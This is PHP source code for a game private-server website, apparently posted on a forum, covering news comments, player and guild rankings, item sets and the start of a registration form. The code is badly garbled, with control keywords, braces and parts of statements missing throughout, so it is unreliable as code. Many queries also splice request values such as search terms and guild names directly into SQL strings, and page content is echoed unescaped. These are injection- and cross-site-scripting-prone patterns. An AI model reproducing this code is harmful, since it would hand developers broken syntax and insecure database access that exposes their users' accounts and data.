[ 'content' ]); $row [ 'content' ] = misc :: applyAttributesToText ( $row [ 'content' ]); $datetime = strtotime ( $row [ 'time' ]); $mssqldate = date ( "d/m/y" , $datetime ); ?> <?php if( strtotime ( $row [ 'time' ]) > strtotime ( 'last week' )) { $_NEW = "" ; $_NEW = "<code>New</code>" ; ?> <div class="headline"><?php echo $_NEW ; ?> <a href="#" onclick="return false" onmousedown="javascript<?php echo $row [ id ]; ?> ')"><?php echo $row [ title ]; ?> <img src="assets/img/expand.png" alt="Toggle" title="Show content" style="position:relative;" /><?php echo $mssqldate ; ?> )</font><?php echo $row [ id ]; ?> "><?php echo $row [ content ]; ?> </small><?php } ?> <?php } else { $nID = (int) $_GET [ 'comment' ]; //cast to int . if(!isset( $_GET [ 'page' ])) $_GET [ 'page' ] = 1 ; core :: $sql -> numRows ( "select * from srcms_news where id=' $nID '" ) > 0 ) $getTitle = core :: $sql -> getRow ( "select title from srcms_news where id=' $nID '" ); ?> <?php echo $getTitle ; ?> </h1><?php echo $getTitle ; ?> </li><?php $hGetComments = core :: $sql -> exec ( "select * from srcms_newscomments where newsID=' $nID '" ); $commentData = array(); $a = 0 ; $row = mssql_fetch_array ( $hGetComments )) $commentData [ $a ] = array( $row [ 'id' ], $row [ 'text' ], $row [ 'author' ], $row [ 'time' ]); $a ++; $_GET [ 'page' ] = (int) $_GET [ 'page' ]; $_GET [ 'page' ])) $_GET [ 'page' ] = 1 ; $i = (( $_GET [ 'page' ] - 1 ) * 10 ); $i < (( $_GET [ 'page' ]) * 10 ); $i ++) $nCommentID = $commentData [ $i ][ 0 ]; $szText = $commentData [ $i ][ 1 ]; $szText = misc :: applyAttributesToText ( $szText ); $szText = security :: fromHTML ( $szText ); $szAuthor = $commentData [ $i ][ 2 ]; $szTime = $commentData [ $i ][ 3 ]; strlen ( $szText ) == 0 ) break; $szAvatar = user :: getUserAvatarUrl ( $szAuthor ); $commentPanelLinks = "" ; $isCommentOwner = core :: $sql -> getRow ( "select whois from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $szAuthor ). "'" ); $isAdmin = core :: $sql -> getRow ( "select whois from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $_SESSION [ 'username' ]). "'" ); $szAuthor == $_SESSION [ 'username' ] || $isAdmin == "admin" ) $commentPanelLinks = "<a href='?pg=news&del= $nCommentID &backid= $nID '><b>Delete</b></a>" ; $szRank = user :: getRankText ( $isCommentOwner ); ?> <div class="media"><?php echo $szAvatar ; ?> " alt="<?php echo ucwords ( $szAuthor ); ?> "></a><?php echo $szAuthor ; ?> '> <?php echo $szRank ; echo " " ; echo ucwords ( $szAuthor ); ?> </a></h4><?php echo $szText ; ?> <div class="pull-right">Posted at <?php echo $szTime ; ?> - <?php echo $commentPanelLinks ; ?> </div></div><?php } $_GET [ 'page' ] != 1 ) echo "<a href='?pg=news&comment= $nID &page=" .( $_GET [ 'page' ] - 1 ). "'><</a>" ; $nPages = 0 ; $a = 1 , $i = 0 ; $i < count ( $commentData ); $i ++) $i % 10 == 0 ) "<a href='?pg=news&comment= $nID &page= $a '> $a </a> " ; $a ++; $nPages ++; $_GET [ 'page' ] < $nPages ) echo "<a class='pageblue' href='?pg=news&comment= $nID &page=" .( $_GET [ 'page' ] + 1 ). "'>></a>" ; $_SESSION [ 'username' ])) $_POST [ 'submit' ])) ?> <br /><form method="post"><?php } $cleanText = stripslashes ( security :: toHTML ( $_POST [ 'commentText' ])); strlen ( $cleanText ) < $core -> aConfig [ 'minNewsCommentLen' ] || strlen ( $cleanText ) > $core -> aConfig [ 'maxNewsCommentLen' ]) "<br/>Your message is too short or too long. It has to be at least <b>" . $core -> aConfig [ 'minNewsCommentLen' ]. "</b> . strlen ( $cleanText ). "</b> symbols long. Max length is " . $core -> aConfig [ 'maxNewsCommentLen' ]. ".<br/>" ; misc :: back (); $datetime = misc :: getDateTime (); core :: $sql -> exec ( "insert into srcms_newscomments(newsID, author, text, time) values(' $nID ',' $_SESSION [ username ] ', ' $cleanText ', ' $datetime ')" ); "<br/><br/><b>Your comment has been successfully added</b>" ; misc :: redirect ( "?pg=news&comment= $nID " , 1 ); "<br/><br/>You must be logged in to post comments" ; "<br/>You can't comment news article that doesn't exist." ; ?>
rank
كود PHP:
<?php global $core ; $_GET [ 'type' ]) //Characters Ranking case( 'char' ): ?> <!--=== Breadcrumbs ===--><?php if(isset( $_GET [ 'name' ]) && security :: isSecureString ( $_GET [ 'name' ], 3 )) $nCharID = char :: charIDByCharname ( $_GET [ 'name' ]); $nCharID == 0 ) "There is no character with such nickname<br/>" ; //main $szUsername = user :: usernameByCharname ( $_GET [ 'name' ]); $bCanView = core :: $sql -> getRow ( "select ispublic from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $szUsername ). "'" ); $bCanView == 1 ) //DEBUG >= = = { //switch to shd db core :: $sql -> changeDB ( "shard" ); $hGuild = core :: $sql -> getRow ( "select JobType from _CharTrijob where CharID=' $nCharID '" ); $jobType = char :: jobTypeByID ( $hGuild ); $hData = core :: $sql -> fetchArray ( "select * from _Char where CharID=' $nCharID '" ); strlen ( $hData [ 'NickName16' ]) < 2 ) $hData [ 'NickName16' ] = "<b>None</b>" ; $ownerStr = null ; $core -> aConfig [ 'allowShowCharOwner' ] == 1 ) $ownerStr = "<a href='?pg=viewprofile&username= $szUsername ' class='color-red'> $szUsername </a>" ; #echo $ownerStr; $nGuildName = guild :: guildNameByID ( $hData [ 'GuildID' ]); $nCharID = char :: charIDByCharname ( $_GET [ 'name' ]); core :: $sql -> changeDB ( "log" ); $charstatus = core :: $sql -> exec ( "select top 1 EventID,EventTime from _LogEventChar where CharID = ' $nCharID ' order by EventTime DESC" ); core :: $sql -> numRows ( "select top 1 EventID,EventTime from _LogEventChar where CharID = ' $nCharID ' order by EventTime DESC" ) == 0 ) $StatusIS = "<img src='img/status/offline.gif' /> Offline" ; $row1 = mssql_fetch_array ( $charstatus )) $charEvent = $row1 [ 'EventID' ]; $charEvent ) 4 : $StatusIS = "<img src='img/status/online.gif' /> <b class='color-green'>Online</b>" ; 6 : $StatusIS = "<img src='img/status/offline.gif'/> <b class='color-red'>Offline</b>" ; $StatusIS = "<img src='img/status/offline.gif'/> <b class='color-red'>Offline</b>" ; core :: $sql -> changeDB ( "acc" ); //Tiger Girl $uniquetg = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_CH_TIGERWOMAN' " ); //Cerburus $uniqueker = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_EU_KERBEROS' " ); //IVY $uniqueivy = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_AM_IVY' " ); //Uruchi $uniqueuruchi = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_OA_URUCHI' " ); //Isy $uniqueisy = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_KK_ISYUTARU' " ); //Lord Yarkan $uniquelord = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_TK_BONELORD' " ); //Demon $uniquedemon = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_RM_TAHOMET' " ); //SOSO $uniquesoso = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_TQ_BLACKSNAKE' " ); $uniquemedusa = core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' and MobName = 'MOB_TQ_WHITESNAKE' " ); /* ?> <?php echo $hData [ CharName16 ]; ?> </td><?php echo $nGuildName ; ?> </td><?php echo $jobType ; ?> </td><?php echo $hData [ CharName16 ]; ?> '><b class='color-green'><?php echo $hData [ CharName16 ]; ?> </b></a></td><?php /*<tr> ?> <tr><?php echo $hData [ CurLevel ]; ?> </td><?php /*<tr> ?> <tr><?php echo $hData [ Strength ]; ?> </td><?php echo $hData [ Intellect ]; ?> </td><?php /*<tr> ?> <tr><?php echo $StatusIS ; ?> </td><?php echo $hData [ LastLogout ]; ?> </td><?php echo $uniquetg ; ?> </td><?php echo $uniqueker ; ?> </td><?php echo $uniqueivy ; ?> </td><?php echo $uniqueuruchi ; ?> </td><?php echo $uniqueisy ; ?> </td><?php echo $uniquelord ; ?> </td><?php echo $uniquedemon ; ?> </td><?php echo $uniquesoso ; ?> </td><?php echo $uniquemedusa ; ?> </td><?php core :: $sql -> changeDB ( 'acc' ); core :: $sql -> numRows ( "select * from Evangelion_uniques where CharName=' $hData [ CharName16 ] '" ) == 0 ) "This character has no uniques kills!" ; ?> <table class="table table-striped" border="0" cellpadding="0" cellspacing="0"><?php echo $hData [ CharName16 ]; ?> </b>)</div></td><?php $hQuery = core :: $sql -> exec ( "select top 30 * from Evangelion_uniques where CharName=' $hData [ CharName16 ] ' order by time desc" ); $row = mssql_fetch_array ( $hQuery )) $datetime1 = strtotime ( $row [ 'time' ]); $mssqldate1 = date ( "d-m-y" , $datetime1 ); "<tr>" ; $UniqueType = $row [ 'MobName' ]; $UniqueType ) { // Tiger Girl case "MOB_CH_TIGERWOMAN" : '<td>Tiger Girl</td><td>' . $mssqldate1 . '</td>' ; "MOB_CH_TIGERWOMAN_L3" : '<td>Tiger Girl (Titan)</td><td>' . $mssqldate1 . '</td>' ; // XXX case "MOB_OA_URUCHI" : '<td>Uruchi</td><td>' . $mssqldate1 . '</td>' ; "MOB_KK_ISYUTARU" : '<td>Isyutaru</td><td>' . $mssqldate1 . '</td>' ; "MOB_TK_BONELORD" : '<td>Lord Yarkan</td><td>' . $mssqldate1 . '</td>' ; "MOB_EU_KERBEROS" : '<td>Cerberus</td><td>' . $mssqldate1 . '</td>' ; "MOB_AM_IVY" : '<td>Captain Ivy</td><td>' . $mssqldate1 . '</td>' ; "MOB_RM_TAHOMET" : '<td>Demon Shaitan</td><td>' . $mssqldate1 . '</td>' ; "MOB_KK_ISYUTARU_L3" : '<td>Isyutaru (Titan)</td><td>' . $mssqldate1 . '</td>' ; "MOB_TK_BONELORD_L3" : '<td>Lord Yarkan (Titan)</td><td>' . $mssqldate1 . '</td>' ; "MOB_RM_TAHOMET_L3" : '<td>Demon Shaitan (Titan)</td><td>' . $mssqldate1 . '</td>' ; "MOB_EU_KERBEROS_L3" : '<td>Cerberus (Titan)</td><td>' . $mssqldate1 . '</td>' ; "MOB_AM_IVY_L3" : '<td>Captain Ivy (Titan)</td><td>' . $mssqldate1 . '</td>' ; "MOB_OA_URUCHI_L3" : '<td>Uruchi (Titan)</td><td>' . $mssqldate1 . '</td>' ; "MOB_TQ_BLACKSNAKE_L3" : '<td>SoSo The Hades Viper (Titan)</td><td>' . $mssqldate1 . '</td>' ; "</tr>" ; ?> </table><?php core :: $sql -> changeDB ( 'shard' ); #misc::back(); } else echo "Owner of account on which this character is created didn't want you to view he's (her) data.<br/>" ; core :: $sql -> changeDB ( "shard" ); $hQuery = core :: $sql -> exec ( "select top 50 * from _Char where CharName16 not like '%[GM]%' order by CurLevel desc" ); ?> <table class="table table-striped" border="0" cellpadding="0" cellspacing="0"><?php $n = 1 ; $row = mssql_fetch_array ( $hQuery )) $szUsername = user :: usernameByCharname ( $row [ 'CharName16' ]); $bCanView = core :: $sql -> getRow ( "select ispublic from srcms_userprofiles where JID='" . user :: accountJIDbyUsername ( $szUsername ). "'" ); $bCanView > 0 ) $icon = "" ; $row [ 'RefObjID' ] < 3000 ) $icon = "<img src='img/Character/race_china.png'>" ; $icon = "<img src='img/Character/race_euro.png'>" ; ?> <tr><?php echo $n ; ?> </b></td><?php echo $icon ; ?> </td><?php echo $row [ CharName16 ]; ?> '><b class="color-green"><?php echo $row [ CharName16 ]; ?> </b></a></td><?php echo $row [ CurLevel ]; ?> </td><?php /*<td align='center'><?php echo $row[RemainSkillPoint];?></td> */ ?> <td align='center'><?php echo $row [ Strength ]; ?> </td><?php echo $row [ Intellect ]; ?> </td><?php $n ++; ?> </table><?php } //Search Character Script. case( 'search_char' ): ?> <!--=== Breadcrumbs ===--><?php if(!isset( $_POST [ 'searchfor' ])) ?> <form method='post' class="reg-page"><?php } $bExit = false ; security :: isSecureString ( $_POST [ 'searchfor' ], 3 )) $bExit = true ; ?> <span class="alert alert-error">Character name contains forbidden symbols!</span><?php } strlen ( $_POST [ 'searchfor' ]) == 0 ) $bExit = true ; ?> <span class="alert alert-error">Character name can't be 0 symbols long!</span><?php } strlen ( $_POST [ 'searchfor' ]) > 16 ) $bExit = true ; ?> <span class="alert alert-error">Character name too long!</span><?php } $bExit ) "<br />" ; core :: $sql -> changeDB ( 'shard' ); $hQuery = core :: $sql -> exec ( "select top 50 * from _Char where CharName16 like '% $_POST [ searchfor ] %'" ); $nResults = 0 ; ?> <table class="table table-striped" border="0" cellpadding="0" cellspacing="0"><?php while( $row = mssql_fetch_array ( $hQuery )) ?> <tr><?php echo $row [ CharName16 ]; ?> '><b class="color-green"><?php echo $row [ CharName16 ]; ?> </b></a></td><?php $nResults ++; ?> </table><?php if( $nResults > 0 ) ?> <br /><div class="pull-left">Found [<b class="color-green"><?php echo $nResults ; ?> </b>] characters!</div><br /><?php echo misc :: back (); ?> </div><br /><?php } '<div class="pull-left"> No characters found </div><br /><br /><br />' ; #echo "<br /><br />"; ?> </div><!--/row-fluid--><?php } //Search Guild System case( 'search_guild' ): ?> <!--=== Breadcrumbs ===--><?php core :: $sql -> changeDB ( 'shard' ); $_POST [ 'search_for' ])) ?> <?php } $bExit = false ; security :: isSecureString ( $_POST [ 'search_for' ], 3 )) $bExit = true ; ?> <span class="alert alert-error">Guild name contains forbidden symbols !</span><?php } strlen ( $_POST [ 'search_for' ]) == 0 ) $bExit = true ; ?> <span class="alert alert-error">Guild name length can't be 0</span><?php } strlen ( $_POST [ 'search_for' ]) > 16 ) $bExit = true ; ?> <span class="alert alert-error">Guild name too long</span><?php } $bExit ) core :: $sql -> changeDB ( 'shard' ); $hQuery = core :: $sql -> exec ( "select top 50 * from _Guild where Name like '% $_POST [ search_for ] %'" ); $nResults = mssql_num_rows ( $hQuery ) > 0 ) ?> <table class="table table-striped" border="0" cellpadding="0" cellspacing="0"><?php while( $row = mssql_fetch_array ( $hQuery )) ?> <tr><?php echo $row [ Name ]; ?> '><b class="color-green"><?php echo $row [ Name ]; ?> </b></a></td><?php } ?> </table><?php echo $nResults ; ?> </b>]<br /><?php echo misc :: back (); ?> </div><br /><?php } "No results!<br /><br />" ; #echo "<br /><br />"; ?> </div><!--/row-fluid--><?php } //Guilds Ranking case( 'guild' ): ?> <!--=== Breadcrumbs ===--><?php core :: $sql -> changeDB ( 'shard' ); $_GET [ 'name' ])) $hQuery = core :: $sql -> exec ( "select top 50 * from _Guild where ID > 0 and ID != 24 order by Lvl desc,GatheredSP desc" ); ?> <table class="table table-striped" border="0" cellpadding="0" cellspacing="0"><?php $nGuild = 1 ; $row = mssql_fetch_array ( $hQuery )) $nMembers = core :: $sql -> getRow ( "select count(*) from _GuildMember where GuildID=' $row [ ID ] '" ); ?> <tr><?php echo $nGuild ; ?> </b></td><?php echo $row [ Name ]; ?> '><b class="color-green"><?php echo $row [ Name ]; ?> </b></a></td><?php echo $row [ Lvl ]; ?> </td><?php echo $nMembers ; ?> </td><?php echo $row [ GatheredSP ]; ?> </td><?php $nGuild ++; ?> </table><?php echo misc :: back (); #misc::back(); } security :: isSecureString ( $_GET [ 'name' ], 3 )) core :: $sql -> numRows ( "select * from _Guild where Name=' $_GET [ name ] '" ) == 0 ) "Guild with such name not found." ; $hGuildData = mssql_fetch_array ( mssql_query ( "select * from _Guild where Name=' $_GET [ name ] '" )); $hGuildMembers = core :: $sql -> exec ( "select * from _GuildMember where GuildID=' $hGuildData [ ID ] ' order by MemberClass asc,Contribution DESC,GuildWarKill DESC,CharLevel DESC,GP_Donation DESC" ); /* ?> <table class="table table-striped" border="0" cellpadding="0" cellspacing="0"><?php echo $hGuildData [ Name ]; ?> </b></td><?php echo $hGuildData [ Lvl ]; ?> </td><?php echo $hGuildData [ GatheredSP ]; ?> </td><?php echo $hGuildData [ FoundationDate ]; ?> </td><?php $n = 1 ; $row = mssql_fetch_array ( $hGuildMembers )) $cName = char :: charnameByCharID ( $row [ 'CharID' ]); $szNickname = "" ; $nRefObjID = core :: $sql -> getRow ( "select RefObjID from _Char where CharName16=' $cName '" ); $icon = "" ; $nRefObjID < 3000 ) $icon = "<img src='img/Character/race_china.png'>" ; $icon = "<img src='img/Character/race_euro.png'>" ; $memberType = "" ; $row [ 'MemberClass' ] == 0 ) $memberType = "<font class='color-red'>Master</font>" ; $memberType = "Member" ; $row [ 'Nickname' ])) $szNickname = "<font color='blue'>NONE</font>" ; $szNickname = $row [ 'Nickname' ]; ?> <tr><?php echo $n ; ?> </td><?php echo $icon ; ?> </td><?php echo $cName ; ?> '><b class="color-green"><?php echo $cName ; ?> </a></td><?php echo $szNickname ; ?> </td><?php echo $row [ CharLevel ]; ?> </td><?php echo $row [ GP_Donation ]; ?> </td><?php echo $row [ GuildWarKill ]; ?> </td><?php echo $row [ GuildWarKilled ]; ?> </td><?php echo $memberType ; ?> </td><? $n ++; "</table>" ; misc :: back (); "Invalid guild name." ; ?> </div><!--/row-fluid--><?php } //Unique Kills Ranking case( 'unique' ): ?> <!--=== Breadcrumbs ===--><?php core :: $sql -> changeDB ( 'acc' ); $n = 1 ; $hQuery = core :: $sql -> exec ( "select top 100 * from Evangelion_uniques order by time desc" ); ?> <table class="table table-striped" border="0" cellpadding="0" cellspacing="0"><?php while( $row = mssql_fetch_array ( $hQuery )) $UniqueType = $row [ 'MobName' ]; $UniqueType ) { // Tiger Girl case "MOB_CH_TIGERWOMAN" : '<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Tiger Girl</td><td>' . $row [ 'time' ]. '</td></tr>' ; //Cerberus case "MOB_EU_KERBEROS" : '<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Cerberus</td><td>' . $row [ 'time' ]. '</td></tr>' ; //Captain Ivy case "MOB_AM_IVY" : '<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Captain Ivy</td><td>' . $row [ 'time' ]. '</td></tr>' ; //Uruchi case "MOB_OA_URUCHI" : '<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Uruchi</td><td>' . $row [ 'time' ]. '</td></tr>' ; //Isyutaru case "MOB_KK_ISYUTARU" : '<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Isyutaru</td><td>' . $row [ 'time' ]. '</td></tr>' ; //Lord Yarkan case "MOB_TK_BONELORD" : '<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Lord Yarkan</td><td>' . $row [ 'time' ]. '</td></tr>' ; //Demon Shaitan case "MOB_RM_TAHOMET" : '<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>Demon Shaitan</td><td>' . $row [ 'time' ]. '</td></tr>' ; //Medusa case "MOB_TQ_BLACKSNAKE" : '<tr><td>' . $n . '</td><td><a href="?pg=rank&type=char&name=' . $row [ 'CharName' ]. '"><b class="color-green">' . $row [ 'CharName' ]. '</b></a></td><td>SoSo The Black Viper </td><td>' . $row [ 'time' ]. '</td></tr>' ; //Anything Else will be posted has pk2 name (must be added to those lines if you wanna add a real name. default: $n ++; ?> </table><?php } // Job Ranking case( 'job' ): core :: $sql -> changeDB ( "shard" ); $hQuery = core :: $sql -> exec ( "select top 50 * from _CharTrijob order by Contribution desc, Exp desc, Level desc" ); ?> <!--=== Breadcrumbs ===--><?php $n = 1 ; $row = mssql_fetch_array ( $hQuery )) $jobType = char :: jobTypeByID ( $row [ 'JobType' ]); $charName = char :: charnameByCharID ( $row [ 'CharID' ]); ?> <tr><?php echo $n ; ?> </b></td><?php echo $charName ; ?> '><?php echo $charName ; ?> </a></td><?php echo $jobType ; ?> </td><?php echo $row [ Exp ]; ?> </td><?php echo $row [ Contribution ]; ?> </td><?php $n ++; ?> </table><?php break; //Job Ranking - Thiefs Only case( 'jobthief' ): core :: $sql -> changeDB ( "shard" ); $hQuery = core :: $sql -> exec ( "select top 50 * from _CharTrijob where JobType = 2 order by Contribution desc, Exp desc, Level desc" ); ?> <!--=== Breadcrumbs ===--><?php $n = 1 ; $row = mssql_fetch_array ( $hQuery )) $jobType = char :: jobTypeByID ( $row [ 'JobType' ]); $charName = char :: charnameByCharID ( $row [ 'CharID' ]); ?> <tr><?php echo $n ; ?> </b></td><?php echo $charName ; ?> '>$charName;?></a></td><?php echo $jobType ; ?> </td><?php echo $row [ Exp ]; ?> </td><?php echo $row [ Contribution ]; ?> </td><?php $n ++; ?> </table><?php break; //Job Ranking - Hunters Only case( 'jobhunter' ): core :: $sql -> changeDB ( "shard" ); $hQuery = core :: $sql -> exec ( "select top 50 * from _CharTrijob where JobType = 3 order by Contribution desc, Exp desc, Level desc" ); ?> <!--=== Breadcrumbs ===--><?php $n = 1 ; $row = mssql_fetch_array ( $hQuery )) $jobType = char :: jobTypeByID ( $row [ 'JobType' ]); $charName = char :: charnameByCharID ( $row [ 'CharID' ]); ?> <tr><?php echo $n ; ?> </b></td><?php echo $charName ; ?> '><?php echo $charName ; ?> </a></td><?php echo $jobType ; ?> </td><?php echo $row [ Exp ]; ?> </td><?php echo $row [ Contribution ]; ?> </td><?php $n ++; ?> </table><?php break; //Job Ranking - Trader Only case( 'jobtrader' ): core :: $sql -> changeDB ( "shard" ); $hQuery = core :: $sql -> exec ( "select top 50 * from _CharTrijob where JobType = 1 order by Contribution desc, Exp desc, Level desc" ); ?> <!--=== Breadcrumbs ===--><?php $n = 1 ; $row = mssql_fetch_array ( $hQuery )) $jobType = char :: jobTypeByID ( $row [ 'JobType' ]); $charName = char :: charnameByCharID ( $row [ 'CharID' ]); ?> <tr><?php echo $n ; ?> </b></td><?php echo $jobType ; ?> </td><?php echo $row [ Exp ]; ?> </td><?php echo $row [ Contribution ]; ?> </td><?php $n ++; ?> </table><?php break; //Honor Ranking case( 'honor' ): core :: $sql -> changeDB ( "shard" ); $hHonorRank = core :: $sql -> exec ( "select * from _TrainingCampHonorRank where CampID IS NOT NULL order by Ranking ASC" ); ?> <!--=== Breadcrumbs ===--><?php while( $row = mssql_fetch_array ( $hHonorRank )) $data = misc :: getCampDataByID ( $row [ 'CampID' ]); ?> <tr><?php echo $row [ Ranking ]; ?> </b></td><?php echo $data [ OwnerName ]; ?> '><?php echo $data [ OwnerName ]; ?> </a></td><?php echo $data [ GraduateCount ]; ?> </td><?php } ?> <?php } //We'll be added in future updates. case( 'set_plus' ): core :: $sql -> changeDB ( "shard" ); ?> <!--=== Breadcrumbs ===--><?php $query = core :: $sql -> exec ( " ); $row = mssql_fetch_array ( $query )){ ?> <?php echo $row [ 'CharName16' ]; ?> "><?php echo $row [ 'CharName16' ]; ?> </a></td><?php echo $row [ 'AssocFileIcon128' ]; ?> .png" width="32" height="32" alt=""/></td><?php echo $row [ 'EndTextString' ]; ?> </td><?php $totalvalue = $row [ 'OptLevel' ]+ $row [ 'nOptValue' ]; $advonly = $row [ 'nOptValue' ]; $itemclass = $row [ 'ItemClass' ]; $itemclass ) { 1 : '<td>Normal</td>' ; 2 : '<td>Seal Of Moon</td>' ; 3 : '<td>Seal Of Sun</td>' ; 4 : '<td>Normal</td>' ; 5 : '<td>Seal Of Moon</td>' ; 6 : '<td>Seal Of Sun</td>' ; 7 : '<td>Normal</td>' ; 8 : '<td>Seal Of Star</td>' ; 9 : '<td>Seal Of Moon</td>' ; 10 : '<td>Seal Of Sun</td>' ; 11 : '<td>Normal</td>' ; 12 : '<td>Seal Of Star</td>' ; 13 : '<td>Seal Of Moon</td>' ; 14 : '<td>Seal Of Sun</td>' ; 15 : '<td>Normal</td>' ; 16 : '<td>Seal Of Star</td>' ; 17 : '<td>Seal Of Moon</td>' ; 18 : '<td>Seal Of Sun</td>' ; 19 : '<td>Normal</td>' ; 20 : '<td>Seal Of Star</td>' ; 21 : '<td>Seal Of Moon</td>' ; 22 : '<td>Seal Of Sun</td>' ; 23 : '<td>Normal</td>' ; 24 : '<td>Seal Of Star</td>' ; 25 : '<td>Seal Of Moon</td>' ; 26 : '<td>Seal Of Sun</td>' ; 27 : '<td>Normal</td>' ; 28 : '<td>Seal Of Star</td>' ; 29 : '<td>Seal Of Moon</td>' ; 30 : '<td>Seal Of Sun</td>' ; '<td>Normal</td>' ; '<td align="center">' . $row [ 'ReqLevel1' ]. '</td>' ; '<td>' . $totalvalue . '' ; $advonly ) { "NULL" : 1 : '+(1) ADV</td>' ; 2 : '+(2) ADV</td>' ; '</tr>' ; ?> </tr><?php break; 'set_char' ): $nCharName = $_GET [ 'name' ]; core :: $sql -> changeDB ( "shard" ); ?> <!--=== Breadcrumbs ===--><?php $query = core :: $sql -> exec ( " $nCharName ' and inv.Slot between 0 and 12 and inv.Slot != 8 ); $row = mssql_fetch_array ( $query )){ '<tr>' ; '<td align="center"><a href="?pg=rank&type=char&name=' . $row [ 'CharName16' ]. '">' . $row [ 'CharName16' ]. '</a></td>' ; $row [ 'AssocFileIcon128' ] == 'xxx' ){ '<td><img src="./item/clean.png" width="32" height="32" alt=""/></td>' ; '<td><img src="./' . $row [ 'AssocFileIcon128' ]. '.png" width="32" height="32" alt=""/></td>' ; $row [ 'CodeName128' ] == 'DUMMY_OBJECT' ){ '<td>-</td>' ; '<td>' . $row [ 'EndTextString' ]. '</td>' ; $totalvalue = $row [ 'OptLevel' ]+ $row [ 'nOptValue' ]; $advonly = $row [ 'nOptValue' ]; $row [ 'CodeName128' ] == 'ITEM_ETC_AMMO_ARROW_01' || $row [ 'CodeName128' ] == 'ITEM_ETC_AMMO_BOLT_01' || $row [ 'CodeName128' ] == 'DUMMY_OBJECT' ){ '<td>-</td>' ; $itemclass = $row [ 'ItemClass' ]; $itemclass ) { 27 : '<td>Normal</td>' ; 28 : '<td>Seal Of Star</td>' ; 29 : '<td>Seal Of Moon</td>' ; 30 : '<td>Seal Of Sun</td>' ; '<td>Normal</td>' ; $row [ 'CodeName128' ] == 'ITEM_ETC_AMMO_ARROW_01' || $row [ 'CodeName128' ] == 'ITEM_ETC_AMMO_BOLT_01' || $row [ 'CodeName128' ] == 'DUMMY_OBJECT' ){ '<td>-</td>' ; '<td>' . $row [ 'ReqLevel1' ]. '</td>' ; $row [ 'CodeName128' ] == 'ITEM_ETC_AMMO_ARROW_01' || $row [ 'CodeName128' ] == 'ITEM_ETC_AMMO_BOLT_01' || $row [ 'CodeName128' ] == 'DUMMY_OBJECT' ){ '<td>-</td>' ; '<td>' . $totalvalue . '' ; $advonly ) { "NULL" : 1 : '+(1) ADV</td>' ; 2 : '+(2) ADV</td>' ; '</tr>' ; ?> <?php echo misc :: back (); ?> </div><!--/row-fluid--><?php break; // Default Page (Without Page Selected) . default: //list functions break; ?>
reg
كود PHP:
<?php global $core ; $_GET [ 'ref' ])) security :: isSecureString ( $_GET [ 'ref' ], 3 ) && $core -> aConfig [ 'allowRefferals' ] == 1 ) $_SESSION [ 'ref' ] = $_GET [ 'ref' ]; $_POST [ 'submit' ]) && $_POST [ 'submit' ] != 'login' ) $errors = array(); strlen ( $_POST [ 'username' ]) > 16 ) $errors [] = "Username too long" ; strlen ( $_POST [ 'username' ]) < 3 ) $errors [] = "Username too short" ; strlen ( $_POST [ 'pass1' ]) > 32 ) $errors [] = "Password [1] too long" ; strlen ( $_POST [ 'pass1' ]) < 6 ) $errors [] = "Password [1] too short" ; strlen ( $_POST [ 'pass2' ]) > 32 ) $errors [] = "Password [2] too long" ; strlen ( $_POST [ 'pass2' ]) < 6 ) $errors [] = "Password [2] too short" ; strlen ( $_POST [ 'email' ]) > 54 ) $errors [] = "Email too long" ; strlen ( $_POST [ 'email' ]) < 6 ) $errors [] = "Email too short" ; /******** Answers Sec *********/ if( strlen ( $_POST [ 'sec_question' ]) > 54 ) $errors [] = "Security Question too long" ; strlen ( $_POST [ 'sec_question' ]) < 3 ) $errors [] = "Security Question too short" ; strlen ( $_POST [ 'sec_answer' ]) > 54 ) $errors [] = "Security Answer too long" ; strlen ( $_POST [ 'sec_answer' ]) < 3 ) $errors [] = "Security Answer too short" ; security :: isSecureString ( $_POST [ 'username' ], 3 )) $errors [] = "Username field contains forbidden symbols" ; security :: isSecureString ( $_POST [ 'pass1' ], 3 )) $errors [] = "Password [1] field contains forbidden symbols" ; security :: isSecureString ( $_POST [ 'pass2' ] , 3 )) $errors [] = "Password [2] field contains forbidden symbols" ; security :: isSecureString ( $_POST [ 'email' ], 2 )) $errors [] = "Email field contains forbidden symbols" ; security :: isCorrectEmail ( $_POST [ 'email' ])) $errors [] = "Invalid email address" ; $_POST [ 'pass1' ] != $_POST [ 'pass2' ]) $errors [] = "Password fields dosent match" ; count ( $errors ) > 0 ) ?> <!--=== Content Part ===--><?php for( $i = 